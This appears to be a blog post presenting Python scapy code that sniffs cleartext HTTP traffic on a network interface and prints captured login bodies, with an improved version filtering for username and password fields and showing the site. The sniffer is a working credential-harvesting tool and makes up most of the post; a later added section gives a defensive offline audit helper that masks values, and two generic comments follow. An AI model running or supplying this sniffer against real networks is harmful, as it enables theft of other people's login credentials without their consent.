[python]Capturing username and password from http login

Clear text site
Nowadays it is quite rare to find an HTTP login page, because HTTP is insecure: everything sent to an HTTP site travels in clear text, so a man in the middle who sniffs the packets can read the username and password.

Sniffing class
I have written a class in Python to demonstrate this man-in-the-middle sniffing. Doing man in the middle is easier said than done; you need to find a way to intercept traffic sent from the original host.

The modules I am using are scapy and scapy-http. Scapy does not have an HTTP filter and hence cannot get the header and payload of the HTTP request; scapy-http provides an HTTP filter which can capture the entire HTTP payload.

import scapy.all # packet capture module
from scapy_http import http # supplementing scapy module by providing http filter
from urllib.parse import unquote # to make url encoded text into string

# main class known as sniffing, the class file is k9.py
class sniffing:
    def __init__(self, interface, filter=""):
        self.sniffs(interface, filter) # filter is optional, default is empty string
        # filter can be "port 80", "tcp", "udp", "port 21" etc...

    # The method that does the packet processing, by printing out packets sniffed by scapy.
    def processing_packets(self, pkt):
        if pkt.haslayer(http.HTTPRequest): # http request filter
            if pkt.haslayer(scapy.all.Raw): # Raw data within the http packet which contains user and pwd.
                # .load is the request body as bytes; str() on the layer does not return the decoded body in Python 3
                body = pkt[scapy.all.Raw].load.decode(errors="replace")
                print(unquote(body)) # print out the raw data that has username and password.

    # The method that calls scapy, this is the actual method that does the work.
    def sniffs(self, interface, filter):
        return scapy.all.sniff(iface=interface, store=0, prn=self.processing_packets, filter=filter)

This is the main code that executes the script:

import k9

try:
    k9.sniffing('en0')

except KeyboardInterrupt:
    print('Exit...')

Result

Below is an improved version of the sniffing class. It prints the request body only when one of the username or password variable names is present, and it also shows the site the username and password are used on.

from scapy import all as scapy # packet capture module
from scapy_http import http # supplementing scapy module by providing http filter
from urllib.parse import unquote # to make url encoded text into string

# keywords guessing the variable names used for username and password
keywords = ['pass', 'password', 'usr', 'username', 'user', 'pwd']


class sniffing():
    def __init__(self, interface, filter=""):
        self.sniffs(interface, filter)

    def processing_data(self, pkt):
        if pkt.haslayer(http.HTTPRequest): # look for http request
            req = pkt[http.HTTPRequest]
            # Host and Path are bytes in Python 3, decode them before printing the URL
            print(req.Host.decode(errors="replace") + req.Path.decode(errors="replace"))
            if pkt.haslayer(scapy.Raw): # username and password appear in the raw field
                # .load is the request body as bytes; decode it once and reuse it
                body = pkt[scapy.Raw].load.decode(errors="replace")
                for keyword in keywords: # check if each keyword exists
                    if keyword in body: # in the raw field
                        print(unquote(body)) # if exists, print out the content once.
                        break

    def sniffs(self, interface, filter):
        return scapy.sniff(iface=interface, store=False, prn=self.processing_data, filter=filter)
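
An added example, not from the original post: an offline audit helper that takes the raw bytes of an HTTP request, matches form field names exactly instead of searching the whole body for a keyword, and reports credential fields with their values masked. The function name, the sample requests and the host intranet.example are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Field names treated as credential-bearing (the same guesses as the keywords list)
CREDENTIAL_FIELDS = {'pass', 'password', 'usr', 'username', 'user', 'pwd'}


def audit_http_request(raw: bytes):
    """Return (url, {field: masked_value}) for a cleartext HTTP request,
    or None if the body carries no credential-named form fields."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    try:
        _method, path, _version = lines[0].split(" ", 2)
    except ValueError:
        return None  # not an HTTP request line
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if "application/x-www-form-urlencoded" not in headers.get("content-type", "").lower():
        return None
    # parse_qsl splits on & and =, and percent-decodes each name and value
    fields = parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    exposed = {
        name: "*" * len(value)  # report the exposure, never the secret itself
        for name, value in fields
        if name.lower() in CREDENTIAL_FIELDS
    }
    if not exposed:
        return None
    return "http://" + headers.get("host", "?") + path, exposed


# Constructed sample requests (not captured traffic)
LOGIN = (b"POST /login.php HTTP/1.1\r\nHost: intranet.example\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 37\r\n\r\nusername=alice&password=s3cr%40t&go=1")
SEARCH = (b"POST /search HTTP/1.1\r\nHost: intranet.example\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: 17\r\n\r\nq=password+policy")

if __name__ == "__main__":
    for request in (LOGIN, SEARCH):
        print(audit_http_request(request))
```

The second sample contains the word "password" only as a search term, so a substring check would flag it while the field-name match does not.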

2 Responses to [python]Capturing username and password from http login

  1. Excellent article. Keep posting such kind of information on your blog. I'm really impressed by your blog.
    Hello there, You have performed a fantastic job. I will definitely digg it and in my view recommend to my friends. I am confident they’ll be benefited from this site.

  2. I have read so many articles regarding the blogger lovers but this piece of writing is really a pleasant article, keep it up.
